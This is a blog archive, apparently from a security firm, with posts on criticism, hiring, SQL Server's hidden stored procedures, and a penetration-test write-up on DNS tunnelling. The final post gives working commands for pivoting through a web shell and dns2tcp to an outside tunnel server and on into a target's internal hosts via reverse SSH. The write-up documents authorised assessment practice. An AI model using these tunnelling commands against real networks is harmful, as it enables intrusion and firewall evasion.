Grey bar Blue bar
Share this:

Mon, 7 Dec 2009

Criticism, Cheerleading, and Negativity

[Alex Payne] has an excellent post up titled "Criticism, Cheerleading, and Negativity". It's a 2 minute read, but its worth it:

"

We understand well the idea of being in favor or something, or against something, but we don't particularly understand how criticism fits into this dichotomy.

..

The reason a person is critical of a thing is because he is passionate about that thing. In order to have a critical opinion, you have to love something enough to understand it, and then love it so much more that you want it to be better. Passion breeds critical thinking.

..

“That sucks” is negativity. “That sucks, here's why, and here's how to fix it” is criticism, and it comes from a place of love. That's the difference.

Everyone says they're comfortable with criticism and with critics, because not being able to handle criticism is a sign of immaturity. What people really want, though, are cheerleaders. Nowhere in life is this more true than in business.

A healthy business needs passionate employees to succeed. Critics are the most passionate people you can find, but we're conditioned to assume that critics are negative curmudgeons with nothing more than slings and arrows to contribute. So rather than seeking out critics, employers seek out cheerleaders.

"

Read the article.. its worth it..

Fri, 5 Jun 2009

Two quick links on "how your app got hacked, even though it looked ok"

The first one from hacker news, aptly titled "How I Hacked Hacker News (with arc security advisory)"

and the 2nd, a welcome-back-to-the-blogosphere-tptacek post on the matasano blog: [Typing The Letters A-E-S Into Your Code? You're Doing It Wrong!]

/mh

PS. for those going, man i wish someone would break down the important crypto stuff for me in a way thats understandable without being patronizing, there is Chris Eng and his owasp talk on [Cryptography For Penetration Testers]

Wed, 4 Feb 2009

On Hiring Staff - The T-Shirt Method..

Anyone who has honestly reflected on what they know about hiring, will tell you that no matter how locked-down you think you have it, you dont. There is still way too much left to chance and way too much that you just dont know. To avoid this, companies that care about preserving their culture will sometimes adopt a "default deny" approach. It's ok to miss a potentially good hire rather than to take on a bad one. This isn't silly geek risk aversion.. It's because one bad hire can do amazing damage to a culture (an area bad hires can be amazingly productive in).

We have been hiring and interviewing people for about 7 years and have learned many lessons along the way but without fail, the one that works best for me, is the T-Shirt test.

The T-Shirt test is simply to ask yourself: "how will i feel standing at a conference, with this guy next to me wearing my company T-Shirt". If you don't like the thought, you shouldn't make the hire.

Now this doesn't translate to only hiring good looking people (but if whats important to you when standing up at a conference is the looks of the person next to you - you probably dont read this blog). The immediate question that comes up is "what if the guy is a real rockstar - but isnt presentable?". In truth, im happy with that, and far prefer it to a very presentable GQ model with a brain of a pea.

The T-Shirt question is a good evaluation of how you feel about the candidate and personally i can tell you that everytime i have ignored it, i have kicked myself a little later.

Interestingly enough, this doesn't have to be just for tech-geeks. If you are sitting at a management level or at a board level, the same question applies. I.e. How do i feel about standing next to this person at X, and how do i feel about him representing me / my brand. If your answer isn't positive, either he shouldn't be there, or you shouldn't..

/mh

Tue, 15 Jul 2008

SQL Server 2005 - Where the $%#@ is that stored proc ?

While doing some prodding on SQL Server, i came across this newness (of course this is probably old hat to many SQL2005 dba's)

Essentially i was tryign to track down something in sp_addserver.

The source of this stored proc [System Databases\Master\System Stored Procedures\sys.sp_addserver] showed that another stored proc called: sys.sp_MSaddserver_internal was being called.

For the life of me though, i could not track down sys.sp_MSaddserver_internal.

Turns out the answer is reasonably well documented [SQL Books Online], with 2005 - MSFT moved stored procs / and friends into a readonly hidden db. This can be made visible by copying the physical .mdf files and attaching them. [Process reasonably documented on the interwebs if you know what to search for]

This effectively will allow you to do a:

use Resource_Copy go select name from sys.objects where name like '%MS%internal%'

to reveal the missing procs for you to examine/tinker with

Thu, 28 Feb 2008

DNS Tunnels (RE-REDUX)

On a recent assessment we came across the following scenario:

1) We have command execution through a web command interpreter script (cmd.jsp) on a remote Linux webserver 2) The box is firewalled only allowing 53 UDP ingress and egress

3) The box is sitting on the network perimeter, with one public IP and one internal IP, and not in a DMZ So we want to tunnel from the SensePost offices to Target Company's internal machines, with this pretty restrictive setup. How did we accomplish this?

1) Upload and compile dns2tcp to the target machine

2) Create a dns2tcp tunnel from target (dns2tcp client) to SPDNSTUNNEL (dns2tcp server)

  • SPDNSTUNNEL is running a dns2tcp server offering two services, ssh and proxy. The dns2tcp client can connect from target to SPDNSTUNNEL's ssh or proxy ports over its 'TCP' channel. This is done with the following command, where we setup target to listen locally on 55555:
    • ./dns2tcpc -z mooo.mooo.moooo -r ssh -l 55555 SPDNSTUNNEL.sensepost.com
    • (Creating Target:55555 ---TCP/53---> SPDNSTUNNEL:sshPort).
3) Create an SSH tunnel from target to SPDNSTUNNEL, forwarding traffic from SPDNSTUNNEL through target to internal network
  • Since we have a non interactive shell on the webserver we needed to create this tunnel with a single command with no prompts. We created a dummy user on SPDNSTUNNEL and created ssh keys for it. We uploaded the ssh keys to target and issuing the following command through an uploaded bashscript ssh-ed into SPDNSTUNNEL through the DNS tunnel:
    • ssh -i /tmp/key -p 55555 -l tunnelUser-R 4444:intranetserver.target.com:80 -o "stricthostkeychecking=no" 127.0.0.1
4) What do we have now? We have SPDNSTUNNEL listening on 4444. Connections made to SPDNSTUNNEL on 4444 will connect to intranetserver.target.com on port 80. So the final step is to create tunnel from our assessment laptop, to SPDNSTUNNEL's 4444, allowing us to connect to the target's internal network from the comfort of our SensePost pods:
  • Linux :: [glenn@localhost] ssh -L 3333:localhost:4444 SPDNSTUNNEL.sensepost.com -l glenn
  • Windows :: Use putty's ssh tunnel option, setting "Source port" to 3333 and destination to "localhost:4444
5) Now, if we want to connect to different target internal machine what do we need to do with the above London Underground of tunnels? We need only to change the exit point on the compromised target machine's tunnel, all the other tunnels stay intact. So we leave the DNS tunnel in place, and tear down the SSH tunnel executing the following on SPDNSTUNNEL:
  • ps auux | grep ssh | egrep '^tunnelUser' | cut -f 3 -d " " | xargs kill ; clear ; tail -f /var/log/secure
    • (tailing /var/log/secure is useful, upon executing the ssh command on target we should see a connect from tunnelUser)
..and create a new ssh tunnel by executing a modified .sh script with the following in it from the target machine:
  • ssh -i /tmp/key -p 55555 -l tunnelUser-R 4444:CEO_laptop.target.com:139 -o "stricthostkeychecking=no" 127.0.0.1
As you see the only change in the whole setup is the internal target machine and point in this one command. We can now connect to the CEO's laptop's samba share by smbclient-ing to our assessment laptop on port 3333.

See the attached picture for a summary of the above.

-Glenn

tunnels_tunnels_FakeExample2.png